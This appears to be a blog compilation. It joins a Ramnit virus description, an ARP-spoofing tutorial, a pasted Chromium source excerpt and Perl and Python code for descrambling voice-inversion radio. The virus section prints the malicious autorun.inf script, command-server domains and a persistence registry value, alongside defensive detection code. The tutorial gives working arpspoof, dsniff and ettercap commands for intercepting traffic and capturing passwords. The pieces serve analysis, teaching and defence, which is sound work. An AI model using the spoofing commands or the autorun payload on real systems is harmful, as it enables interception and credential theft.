Monday, March 21, 2016

VIRUS.WIN32.RAMNIT.A

by Atlantis on April 12th, 2012 in Malware Descriptions.
Detect: Virus.Win32.Ramnit.a
Platform: Win32
Type: Virus
Size: 103936 bytes
Language: C++
md5: CDF0778E1B80069D137A3E7A0C7C787F
sha1: E1826123B190C1FB3D11BBEA33EF6D1CCEABAD43
Summary
It is a malicious program which infects files on a user's PC.
Technical Details
Spreading over Removable Storage Devices
On all removable storage devices connected to the infected computer, the virus creates the following files:
:\Recycler\S-\.cpl (3584 bytes)
:\Recycler\S-\.exe (56832 bytes)
:\Copy of Shortcut to (1).lnk (691 bytes)
:\Copy of Shortcut to (2).lnk (722 bytes)
:\Copy of Shortcut to (3).lnk (858 bytes)
:\Copy of Shortcut to (4).lnk (867 bytes)
:\autorun.inf (11964 bytes)
where
  • the part after "S-" is a digit identifier (e.g.: "1-4-83-4678327503-5842818778-105234524-7024"),
  • the file names are random Latin-alphabet sequences (e.g.: "xVgGwSIp", "lwTCZgQP").
The "autorun.inf" file contains a malicious script:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-\.exe
shell\explore\command=\RECYCLER\S-\.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-\.exe
The script is executed each time the user opens the infected disk in Windows Explorer if the autoplay function is turned on. Once executed, the script launches the ".exe" file. The shortcuts created by the malicious program are exploits for the CVE-2010-2568 vulnerability. This vulnerability in the "shell32.dll" library is an error in shortcut processing (.lnk and .pif files) that allows code from arbitrary Windows libraries to be executed when Windows Explorer displays the shortcut icons. In this way the code of the ".cpl" library is launched, and it in turn launches the ".exe" file. The malicious program prevents the files described above from being modified and re-creates them in an endless loop.
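As an added example, not part of the original description, here is a small Python check that parses an autorun.inf of the shape quoted above and flags the traits a defender would look for: launch commands pointing into a RECYCLER folder with a SID-like name, USEAUTOPLAY=1, and a drive icon borrowed from shell32.dll. Both samples are constructed; the SID-like folder name and the executable name are assembled from the identifier and name examples the description gives and are not real indicators.

```python
import re

# Constructed sample modelled on the autorun.inf script quoted above. The SID-like
# folder and the executable name are assembled from the description's examples
# ("1-4-83-..." and "xVgGwSIp"); the real names differ on every infected drive.
SAMPLE_MALICIOUS = r"""[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-1-4-83-4678327503-5842818778-105234524-7024\xVgGwSIp.exe
shell\explore\command=\RECYCLER\S-1-4-83-4678327503-5842818778-105234524-7024\xVgGwSIp.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-1-4-83-4678327503-5842818778-105234524-7024\xVgGwSIp.exe
"""

# Constructed benign sample: a vendor CD that simply offers its installer.
SAMPLE_BENIGN = r"""[autorun]
open=setup.exe
icon=setup.exe
label=Driver CD
"""

# Keys whose value Windows may run when the volume is opened or autoplayed.
LAUNCH_KEYS = ("open", "shellexecute", r"shell\open\command", r"shell\explore\command")
RECYCLER_DIR = re.compile(r"\\recycler\\", re.IGNORECASE)
SID_LIKE_DIR = re.compile(r"\\s-\d+(?:-\d+){3,}\\", re.IGNORECASE)


def parse_autorun(text):
    """Return {key: value} for the [autorun] section, with keys lower-cased."""
    entries, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def autorun_findings(text):
    """List which traits of the autorun.inf described above are present."""
    entries = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        target = entries.get(key)
        if not target:
            continue
        if RECYCLER_DIR.search(target):
            findings.append(f"{key} launches a program from a RECYCLER folder: {target}")
        if SID_LIKE_DIR.search(target):
            findings.append(f"{key} target sits in a SID-named folder: {target}")
    if entries.get("useautoplay") == "1":
        findings.append("USEAUTOPLAY=1 requests automatic execution on insertion")
    icon = entries.get("icon", "").lower()
    if "shell32.dll" in icon and any(entries.get(k) for k in LAUNCH_KEYS):
        findings.append("icon borrowed from shell32.dll while a launch command is set (drive look-alike)")
    return findings


if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, autorun_findings(sample) or ["nothing flagged"])
```

Run against a mounted removable volume the check only needs the text of its autorun.inf; the benign sample shows that an ordinary "open=setup.exe" entry produces no finding.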
File Infection
The virus infects files with the following extensions:
exe
html
dll
htm
Executable files and Windows dynamic link libraries are infected by appending the virus body to the end of the last PE section of the target file. The program's entry point is then changed so that control passes to the virus code. When infecting HTML and HTM files, the following script is appended to the end of the target document:
Thus, upon each launch, the virus body is saved to the current user's temporary folder as
%Temp%\svchost.exe
and launched for execution.
Payload
Once the infected file is launched, the Trojan decrypts and extracts the following file from its body:
%WorkDir%\Srv.exe
Then the created file is launched for execution. In addition, a copy of the file is created and launched:
%Program Files%\Microsoft\WaterMark.exe
Then the "WaterMark.exe" process launches an instance of the "svchost.exe" system process and injects its code into it; the injected code performs the following actions:
  • Creates a unique identifier (a mutex) with the following name to ensure that only one instance of its process runs in the system:
    Global\SYSTEM_DEMETRA_MAIN
  • Modifies a registry key value to automatically run a malicious software copy created earlier:
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"
    In this way the copy is launched by the "winlogon.exe" process even if the computer starts in safe mode.
  • Prevents modification of the autorun registry key as well as the "WaterMark.exe" file.
  • Creates a configuration file to store the current settings of the malicious software:
    %System%\dmlconf.dat
  • Visits the following resource to check for an Internet connection:
    google.com
  • Implements a backdoor. To obtain a list of commands, it connects to the servers:
    tybdtyutjfyvetscev.com
    ervwetyrbuyouiylkdhrbt.com
    tybsyiutnrtvtybdrser.com
    Depending on the command(s) received from the intruder, the backdoor can perform the following actions:
    - upload files to the infected computer and launch them for execution.
    - connect to another server to get commands.
  • The code injected into the address space of the "svchost.exe" process also carries out the functionality described in the Spreading over Removable Storage Devices and File Infection sections.
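As an added example that is not part of the original description, the following Python triage takes the indicators listed above (the Userinit value, the mutex name, the command servers and the dropped files) and matches them against host telemetry. The telemetry dictionaries, the helper names and the list of trusted Userinit folders are assumptions made for the example.

```python
# Indicators taken from the description above.
RAMNIT_MUTEX = r"Global\SYSTEM_DEMETRA_MAIN"
RAMNIT_C2 = {"tybdtyutjfyvetscev.com", "ervwetyrbuyouiylkdhrbt.com", "tybsyiutnrtvtybdrser.com"}
RAMNIT_FILES = {r"%temp%\svchost.exe", r"%workdir%\srv.exe",
                r"%program files%\microsoft\watermark.exe", r"%system%\dmlconf.dat"}

# Assumption for the example: the only legitimate Userinit entry is userinit.exe
# in the system folder (given either expanded or as %System%).
DEFAULT_USERINIT = "userinit.exe"
TRUSTED_USERINIT_DIRS = {"", "%system%", r"c:\windows\system32"}


def userinit_entries(value):
    """Winlogon runs every non-empty, comma-separated entry of the Userinit value."""
    return [e.strip() for e in value.split(",") if e.strip()]


def userinit_extras(value):
    """Entries other than the genuine userinit.exe in its system folder."""
    extras = []
    for entry in userinit_entries(value):
        folder, _, exe = entry.replace("/", "\\").lower().rpartition("\\")
        if exe != DEFAULT_USERINIT or folder not in TRUSTED_USERINIT_DIRS:
            extras.append(entry)
    return extras


def triage(host):
    """Return (category, detail) findings for one host's telemetry dictionary."""
    findings = []
    for extra in userinit_extras(host.get("userinit", "")):
        findings.append(("persistence", f"Userinit also runs {extra}"))
    if RAMNIT_MUTEX.lower() in {m.lower() for m in host.get("mutexes", [])}:
        findings.append(("mutex", RAMNIT_MUTEX))
    seen = {d.lower().rstrip(".") for d in host.get("dns", [])}
    for name in sorted(seen & RAMNIT_C2):
        findings.append(("c2", name))
    for path in host.get("files", []):
        if path.lower() in RAMNIT_FILES:
            findings.append(("file", path))
    return findings


# Constructed telemetry for one infected and one clean host; the mutex
# "Local\ExampleAppMutex" is a made-up benign name.
INFECTED_HOST = {
    "userinit": r"%System%\userinit.exe,,%Program files%\microsoft\watermark.exe",
    "mutexes": [r"Global\SYSTEM_DEMETRA_MAIN", r"Local\ExampleAppMutex"],
    "dns": ["google.com", "tybdtyutjfyvetscev.com"],
    "files": [r"%Program Files%\Microsoft\WaterMark.exe", r"%System%\dmlconf.dat"],
}
CLEAN_HOST = {
    "userinit": r"C:\Windows\system32\userinit.exe,",
    "mutexes": [r"Local\ExampleAppMutex"],
    "dns": ["google.com"],
    "files": [r"%System%\userinit.exe"],
}

if __name__ == "__main__":
    for label, host in (("infected", INFECTED_HOST), ("clean", CLEAN_HOST)):
        print(label, triage(host) or "no findings")
```

The Userinit check is the part worth keeping beyond this family: the value is a comma-separated list and Winlogon starts every entry, so anything besides the system userinit.exe is a persistence finding regardless of the file name used.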
Removal Recommendations
To delete the malicious program, proceed through the steps listed below:
  1. Run a full scan of your computer using an antivirus program with an up-to-date definition database.
  2. Do not launch EXE, HTM or HTML files and do not reboot your computer until the full scan is complete.
  3. Restore the infected files from the backup copies.
  4. Restore the registry key value (How to Work with System Registry):
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "userinit.exe"
  5. Delete the following files:
    :\Recycler\S-\.cpl (3584 bytes)
    :\Recycler\S-\.exe (56832 bytes)
    :\Copy of Shortcut to (1).lnk (691 bytes)
    :\Copy of Shortcut to (2).lnk (722 bytes)
    :\Copy of Shortcut to (3).lnk (858 bytes)
    :\Copy of Shortcut to (4).lnk (867 bytes)
    :\autorun.inf (11964 bytes)
    %Temp%\svchost.exe
    %WorkDir%\Srv.exe
    %Program Files%\Microsoft\WaterMark.exe
  6. Delete the original Trojan file (its file name and location depend on the way the Trojan originally penetrated the user's computer).
  7. Delete the original Trojan file (its location on the infected PC depends on the way the program was installed on the PC).
  8. Clean the Temporary Internet Files folder, which contains infected files.

ARP Spoofing using Dsniff Tools and Ettercap

A quick demonstration of ARP Spoofing using Dsniff Tools and Ettercap

     Let's start by using Dug Song's Arpspoof program that comes with his Dsniff package. I use the *nix version, but if you look around you may be able to find a Win32 version. The easiest way to run Dsniff is to boot from a BackTrack boot CD. The first thing you should do is make sure packet forwarding is turned on; otherwise your machine will drop all traffic between the hosts you are trying to sniff, causing a denial of service. Some of the tools I use do this automatically (like Ettercap), but to be sure, you may want to do it yourself. Use the following command, depending on the operating system:

Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:
sysctl -w net.inet.ip.forwarding=1

     Now that your computer will forward the traffic you can start ARP Spoofing. Let's assume you want to sniff all traffic between a host and the gateway so you can see the traffic it's sending to the Internet. To get traffic in both directions you would use the following two commands:

arpspoof -t 192.168.1.1 192.168.1.2 >/dev/null &
arpspoof -t 192.168.1.2 192.168.1.1 >/dev/null &


     The ">/dev/null &" part is there to make it easier to run both from one terminal (the redirect has to come before the "&"; written after it, the shell applies it to an empty command and arpspoof's output still reaches the terminal), but you may want to omit it for debugging purposes. Now you can use any package you wish to sniff the connection. To start with I'd recommend using the sniffer Dsniff that comes along with Arpspoof to sniff for plain text passwords. To start sniffing with Dsniff just drop out to a command shell and type:

dsniff

     As Dsniff finds passwords and usernames it will print them to the screen. To look at all sorts of other traffic I would recommend TCPDump or Wireshark. When you are ready to stop ARP Spoofing issue the following command:

killall arpspoof

     This should kill the two instances of Arpspoof started above.
    Another great tool is Ettercap, the Swiss army knife of ARP poisoning and password sniffing. I usually use it in non-interactive mode, but by default it has an ncurses interface that some may find easier to use. If you would like to use Ettercap for ARP poisoning instead, the following commands should serve as good examples. If we wanted to target all hosts on the network and sniff traffic between every node, we would use the following command:

ettercap -T -q -M ARP // //

    Be careful with the above command: having all of the traffic on a large network going through one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.1.1, we would use this command:

ettercap -T -q -M ARP /192.168.1.1/ //

If 192.168.1.1 is the gateway, we should be able to see all outgoing traffic. Here are what the command line option flags do:

-T tells Ettercap to use the text interface; I like this option the best, as the GUI modes are rather confusing.
-q tells Ettercap to be more quiet, in other words less verbose.
-M tells Ettercap the MITM (Man in the Middle) method we want to use, in this case ARP poisoning.
For some other things you can do with Ettercap check out my video Fun with Ettercap Filters: The Movie.

Other Tools

     There are many other packages I would like to mention as well. The first is Cain, which Windows users will be much more comfortable with. It has some great functionality and a nice interface. I have a video tutorial on how to use it here:
    If you like pretty GUIs, Cain is the way to go. It does not have as many options as Ettercap, but it's still pretty cool and has some other Windows-specific extras built in.
    There are also specialized sniffers for certain kinds of content. Driftnet parses out the images people are seeing as they web surf. I've not done a video on Driftnet, but I have done one on NetworkActive, which can also parse out images from web traffic:
    There are also sniffers like P0f that let you fingerprint the OS of hosts passively from their network traffic:
    And that's just the tip of the iceberg when it comes to specialized sniffers.

Mitigating Sniffing Attacks

     There are quite a few ways to mitigate sniffing attacks.

1. Avoid using insecure protocols like Basic HTTP authentication and Telnet. As a matter of fact you should sniff your own network to see what passwords the tools listed above can pick up.
2. If you have to use an insecure protocol, try tunneling it through something to encrypt the sensitive data. I have a video on SSH Dynamic Port Forwarding that shows one way to accomplish this.
3. Look into using static ARP tables between critical workstations and servers. They are more trouble to maintain but limit ARP spoofing.
4. Run software like ARPWatch to detect changes in MAC addresses on your network that may point to Sniffers.
5. Try running tools like Sniffdet and Sentinel to detect network cards in promiscuous mode that may be running sniffing software.
6. Have outside laptops using Wi-Fi that come into your facility use a VPN to connect to the network.
7. Lock down workstations so users can't install sniffing software or boot from a CD like Knoppix.
8. Keep public terminals on a separate LAN from the staff workstations and servers.
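As an added example (not from the original article and not ARPWatch's own code), here is a minimal Python version of what item 4 describes: it tracks which MAC answers for each IP and raises the same kinds of alert ARPWatch does ("new station", "changed ethernet address", "flip flop"), plus a note when one MAC ends up claiming several IPs, which is what the arpspoof session above looks like to a passive observer. The ARP reply log and the MAC addresses are constructed for the demo.

```python
from collections import Counter

# Constructed ARP reply log: (seconds, sender IP, sender MAC). In practice these
# tuples would be filled from a capture of ARP replies on the segment (for
# example from "tcpdump -n -e arp"); the addresses here are made up.
GATEWAY_MAC = "00:11:22:33:44:01"
WORKSTATION_MAC = "00:11:22:33:44:02"
ROGUE_MAC = "de:ad:be:ef:00:01"

SAMPLE_ARP_LOG = [
    (0.0, "192.168.1.1", GATEWAY_MAC),       # gateway answers for itself
    (1.0, "192.168.1.2", WORKSTATION_MAC),   # workstation answers for itself
    (2.0, "192.168.1.1", ROGUE_MAC),         # a third MAC now claims the gateway IP
    (2.1, "192.168.1.2", ROGUE_MAC),         # ... and the workstation IP as well
    (30.0, "192.168.1.1", GATEWAY_MAC),      # the real gateway is heard again
]


class ArpWatch:
    """Track IP-to-MAC bindings and report the changes ARPWatch-style tools alert on."""

    def __init__(self):
        self.current = {}    # ip -> MAC currently bound
        self.previous = {}   # ip -> MAC it was bound to before the last change

    def observe(self, ts, ip, mac):
        mac = mac.lower()
        events = []
        old = self.current.get(ip)
        if old is None:
            events.append((ts, "new station", ip, mac))
        elif old != mac:
            # A binding that returns to an earlier MAC is a "flip flop": the
            # pattern two hosts produce when they fight over one IP.
            kind = "flip flop" if self.previous.get(ip) == mac else "changed ethernet address"
            events.append((ts, kind, ip, mac))
            self.previous[ip] = old
        self.current[ip] = mac
        if old != mac:
            # One MAC answering for several IPs is what a poisoning MITM looks like.
            claimed = sorted(i for i, m in self.current.items() if m == mac)
            if len(claimed) > 1:
                events.append((ts, "mac claims multiple ips", mac, ",".join(claimed)))
        return events


def run_watch(log):
    """Feed a whole log through one watcher and collect the events."""
    watcher = ArpWatch()
    events = []
    for ts, ip, mac in log:
        events.extend(watcher.observe(ts, ip, mac))
    return events


def event_kinds(events):
    return [e[1] for e in events]


if __name__ == "__main__":
    events = run_watch(SAMPLE_ARP_LOG)
    for ts, kind, subject, detail in events:
        print(f"{ts:6.1f}s  {kind:26s} {subject:18s} {detail}")
    print(Counter(event_kinds(events)))
```

On a real segment the "changed ethernet address" events also fire for legitimate reasons (a replaced NIC, DHCP handing an address to a different machine), so the combination to act on is a change followed by one MAC claiming both a gateway and a client address, as the sample log shows.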

I hope you have found this article useful.

Further research:

ARPWatch
http://www-nrg.ee.lbl.gov/ 

Thursday, March 17, 2016

keyboard wrapper migration - fuckin' Keyscore

void Document::setUseSecureKeyboardEntryWhenActive(bool usesSecureKeyboard)
{
    if (m_useSecureKeyboardEntryWhenActive == usesSecureKeyboard)
        return;

    m_useSecureKeyboardEntryWhenActive = usesSecureKeyboard;
    m_frame->selection().updateSecureKeyboardEntryIfActive();
}

bool Document::useSecureKeyboardEntryWhenActive() const
{
    return m_useSecureKeyboardEntryWhenActive;
}

void Document::initSecurityContext(const DocumentInit& initializer)
{
    ASSERT(!getSecurityOrigin());

    if (!initializer.hasSecurityContext()) {
        // No source for a security context.
        // This can occur via document.implementation.createDocument().
        m_cookieURL = KURL(ParsedURLString, emptyString());
        setSecurityOrigin(SecurityOrigin::createUnique());
        initContentSecurityPolicy();
        // Unique security origins cannot have a suborigin
        return;
    }

    // In the common case, create the security context from the currently
    // loading URL with a fresh content security policy.
    enforceSandboxFlags(initializer.getSandboxFlags());
    if (initializer.shouldEnforceStrictMixedContentChecking())
        enforceStrictMixedContentChecking();
    setInsecureRequestsPolicy(initializer.getInsecureRequestsPolicy());
    if (initializer.insecureNavigationsToUpgrade()) {
        for (auto toUpgrade : *initializer.insecureNavigationsToUpgrade())
            addInsecureNavigationUpgrade(toUpgrade);
    }

    if (isSandboxed(SandboxOrigin)) {
        m_cookieURL = m_url;
        setSecurityOrigin(SecurityOrigin::createUnique());
        // If we're supposed to inherit our security origin from our
        // owner, but we're also sandboxed, the only things we inherit are
        // the origin's potential trustworthiness and the ability to
        // load local resources. The latter lets about:blank iframes in
        // file:// URL documents load images and other resources from
        // the file system.
        if (initializer.owner() && initializer.owner()->getSecurityOrigin()->isPotentiallyTrustworthy())
            getSecurityOrigin()->setUniqueOriginIsPotentiallyTrustworthy(true);
        if (initializer.owner() && initializer.owner()->getSecurityOrigin()->canLoadLocalResources())
            getSecurityOrigin()->grantLoadLocalResources();
    } else if (initializer.owner()) {
        m_cookieURL = initializer.owner()->cookieURL();
        // We alias the SecurityOrigins to match Firefox, see Bug 15313
        // https://bugs.webkit.org/show_bug.cgi?id=15313
        setSecurityOrigin(initializer.owner()->getSecurityOrigin());
    } else {
        m_cookieURL = m_url;
        setSecurityOrigin(SecurityOrigin::create(m_url));
    }

    // Set the address space before setting up CSP, as the latter may override
    // the former via the 'treat-as-public-address' directive (see
    // https://mikewest.github.io/cors-rfc1918/#csp).
    if (initializer.isHostedInReservedIPRange()) {
        setAddressSpace(getSecurityOrigin()->isLocalhost() ? WebAddressSpaceLocal : WebAddressSpacePrivate);
    } else {
        setAddressSpace(WebAddressSpacePublic);
    }

    if (importsController()) {
        // If this document is an HTML import, grab a reference to its master document's Content
        // Security Policy. We don't call 'initContentSecurityPolicy' in this case, as we can't
        // rebind the master document's policy object: its ExecutionContext needs to remain tied
        // to the master document.
        setContentSecurityPolicy(importsController()->master()->contentSecurityPolicy());
    } else {
        initContentSecurityPolicy();
    }

    if (getSecurityOrigin()->hasSuborigin())
        enforceSuborigin(getSecurityOrigin()->suboriginName());

    if (Settings* settings = initializer.settings()) {
        if (!settings->webSecurityEnabled()) {
            // Web security is turned off. We should let this document access every other document. This is used primarily by testing
            // harnesses for web sites.
            getSecurityOrigin()->grantUniversalAccess();
        } else if (getSecurityOrigin()->isLocal()) {
            if (settings->allowUniversalAccessFromFileURLs()) {
                // Some clients want local URLs to have universal access, but that setting is dangerous for other clients.
                getSecurityOrigin()->grantUniversalAccess();
            } else if (!settings->allowFileAccessFromFileURLs()) {
                // Some clients do not want local URLs to have access to other local URLs.
                getSecurityOrigin()->blockLocalAccessFromLocalOrigin();
            }
        }
    }
}

https://code.google.com/p/chromium/codesearch#chromium/src/third_party/WebKit/Source/core/dom/Document.cpp&q=keyboard%20wrapper%20migration&sq=package:chromium&type=cs&l=4935

Voice descrambler

This program descrambles band inverted encrypted transmissions, usually found on VHF/UHF. It uses a NCO (numerical controlled oscillator) to re-produce the originally inverted audio band. Use it only if legally permitted in your country. I assume no responsibilities deriving from its use. Standard disclaimer applies

http://www.dxzone.com/dx16133/voice-descrambler.html

Descrambling the voice inversion scrambler


http://www.windytan.com/2013/05/descrambling-voice-inversion.html

Voice inversion is a method of scrambling radio conversations to render speech nearly unintelligible in ordinary radio receivers. As the name implies, it inverts the audio spectrum of a signal, making the lowest frequencies the highest and vice versa. It is not considered encryption; it's merely a sort of Pig Latin on analogue signals. Several voice scramblers utilize it, like the Selectone ST-20.
[Image: A spectrogram of speech, with a cut labeled 'voice inversion' in the middle of the time axis, after which the spectrum appears to be flipped upside down.]
Voice inversion is cancelled by reapplying the inversion, i.e. inverting the audio spectrum again. Here I'll present some least-effort digital descrambling methods for the voice inversion scrambler that may be of interest to hobbyist listeners. The examples are written in Perl.

Easy

In a digitally sampled signal, whole-spectrum inversion can be achieved very easily in the time domain by multiplying every other sample by −1. This is equivalent to amplitude modulating a Nyquist frequency carrier with the signal; the upper sideband will get inverted and nicely overlaid with the lower because of symmetric folding.
open(IN, "sox scrambled.wav -r 8600 -c 1 -t .s16 -|");
open(OUT,"|sox -r 8600 -c 1 -t .s16 - descrambled.wav");
$n = 1;
 
while (not eof IN) {
  read IN, $a, 2;
  print OUT pack("s",unpack("s",$a) * $n);
  $n *= -1;
}
Because the whole spectrum is inverted, a sampling rate has to be chosen to (approximately) match the signal bandwidth. Slight distortion will still remain, unless the chosen Nyquist frequency perfectly matches the inverted zero frequency of the signal, or the "inversion carrier" as Selectone calls it. But speech will nevertheless be much more intelligible than in the original scrambled signal.
For example, consider a scrambled piece of audio that seems to have its highest frequency components at 4300 Hz. We would need to resample the audio at a rate of 8600 Hz and multiply every other sample by −1 to get intelligible audio.
To make things simpler, the Selectone ST-20B supports eight discrete carrier frequencies, namely 2632, 2718, 2868, 3023, 3196, 3339, 3495, and 3729 Hz, which they claim to be "the most commonly used inversion formats".

Difficult

If resampling is out of the question, we can also multiply the samples with a sine wave oscillating at the seemingly highest scrambled frequency. This will produce two sidebands; the lower will be our descrambled audio and will be conveniently at baseband. The upper sideband contains the inverted signal, but at such a high frequency it should not significantly impede intelligibility. We could improve the audio further by silencing the upper sideband using a lowpass filter.
$fs = 48000; # sample rate
$fc = 3729;  # carrier frequency
$filter = " sinc -$fc"; # optional LP filter
 
$fc = freq($fc);
 
open(IN, "sox scrambled.wav -c 1 -b 16 -e signed -t .raw -|");
open(OUT,"|sox -r $fs -c 1 -b 16 -e signed -t .raw - descrambled.wav".
         $filter);
 
while (not eof IN) {
 
  $acc += $fc;
  $acc -= 65536 if ($acc > 32767);
 
  read(IN,$a,2);
  print OUT pack("s",unpack("s",$a) * sin($acc/32768*3.141592653589793));
}

sub freq { int(.5 + $_[0] * 65536 / $fs); }
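As an added example that is not part of the original post, here is a Python version of both the "Easy" and the "Difficult" methods above, with a pure tone standing in for speech so that the result can be checked numerically: the easy method (alternating sample signs at a matched sample rate) and the difficult method (a 16-bit NCO at the carrier frequency, mirroring the Perl accumulator, followed by a low-pass). The low-pass is a Hamming-windowed sinc written in plain Python in place of the sox "sinc" effect, and the frequency estimate is an exact DFT on a 100 Hz grid; the tone frequencies and sample counts are assumptions chosen so that the tones land on DFT bins.

```python
import math


def make_tone(freq_hz, fs, n, amplitude=0.8):
    """n samples of a pure tone; stands in for a single speech component."""
    return [amplitude * math.sin(2 * math.pi * freq_hz * i / fs) for i in range(n)]


def invert_band(samples):
    """'Easy' method: multiply every other sample by -1, i.e. mix with a carrier
    at fs/2. A tone at f comes out at fs/2 - f, so applying it twice restores it."""
    return [x if i % 2 == 0 else -x for i, x in enumerate(samples)]


def nco_mix(samples, fs, carrier_hz):
    """'Difficult' method: multiply by a sine from a 16-bit phase accumulator,
    as in the Perl above (frequency word = round(fc * 65536 / fs), wrap at 32767)."""
    step = int(0.5 + carrier_hz * 65536 / fs)
    acc, out = 0, []
    for x in samples:
        acc += step
        if acc > 32767:
            acc -= 65536
        out.append(x * math.sin(acc / 32768 * math.pi))
    return out


def lowpass_fir(samples, fs, cutoff_hz, taps=101):
    """Hamming-windowed sinc low-pass, a plain-Python stand-in for sox's 'sinc -<fc>'."""
    m = taps - 1
    fc = cutoff_hz / fs                      # cutoff in cycles per sample
    h = []
    for i in range(taps):
        k = i - m / 2
        ideal = 2 * fc if k == 0 else math.sin(2 * math.pi * fc * k) / (math.pi * k)
        h.append(ideal * (0.54 - 0.46 * math.cos(2 * math.pi * i / m)))
    gain = sum(h)
    h = [c / gain for c in h]                # unity gain at DC
    return [sum(h[i] * samples[n - i] for i in range(min(n + 1, taps)))
            for n in range(len(samples))]


def peak_frequency(samples, fs, step_hz=100):
    """Strongest non-DC component on a step_hz grid, from an exact DFT over the
    last fs/step_hz samples (so every grid frequency falls on a bin)."""
    assert fs % step_hz == 0, "fs must be a multiple of step_hz"
    n = fs // step_hz
    frame = samples[-n:]
    best_f, best_p = 0, -1.0
    for k in range(1, n // 2 + 1):
        re = sum(x * math.cos(2 * math.pi * k * i / n) for i, x in enumerate(frame))
        im = sum(x * math.sin(2 * math.pi * k * i / n) for i, x in enumerate(frame))
        power = re * re + im * im
        if power > best_p:
            best_p, best_f = power, k * step_hz
    return best_f


def demo_easy(fs=8600, speech_hz=1000):
    """Scramble a tone with the easy method and undo it the same way.
    With fs = 8600 the carrier sits at 4300 Hz, as in the post's example."""
    clean = make_tone(speech_hz, fs, 4 * (fs // 100))
    scrambled = invert_band(clean)
    restored = invert_band(scrambled)
    return peak_frequency(scrambled, fs), peak_frequency(restored, fs)


def demo_difficult(fs=48000, carrier_hz=4300, speech_hz=1000):
    """Undo an inversion around carrier_hz without resampling: mix with an NCO at
    carrier_hz and low-pass away the upper sideband, as the second Perl script does."""
    scrambled = make_tone(carrier_hz - speech_hz, fs, 680)   # what the scrambler emits
    mixed = nco_mix(scrambled, fs, carrier_hz)               # lower sideband at baseband
    restored = lowpass_fir(mixed, fs, carrier_hz)            # drop the upper sideband
    return peak_frequency(scrambled, fs), peak_frequency(restored, fs)


if __name__ == "__main__":
    print("easy:      scrambled %d Hz -> restored %d Hz" % demo_easy())
    print("difficult: scrambled %d Hz -> restored %d Hz" % demo_difficult())
```

Both demos report the same pair: a 1000 Hz component that the scrambler has moved to 3300 Hz comes back to 1000 Hz. The 680-sample input in the difficult demo leaves the FIR's 100-sample start-up transient outside the 480-sample window that peak_frequency measures.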

A word about split-band scrambling

Some scramblers, like the PCD4440T, use a split-band inversion where the audio is split into two frequency bands that are then inverted separately and combined. The split frequency is user-adjustable. This is not a significant improvement; it would only require us to do the digital deinversion in two parts with different parameters.

Results

And here's a demo of what it sounds like. We begin with a (fake) scrambled message. Then the easy descramble comes on with a 1000 Hz error in the selected sampling rate; then the easy descramble with an error of 300 Hz; and the difficult method with a spot-on carrier frequency and with the upper sideband also audible. In the end, we also filter out the unwanted upper sideband.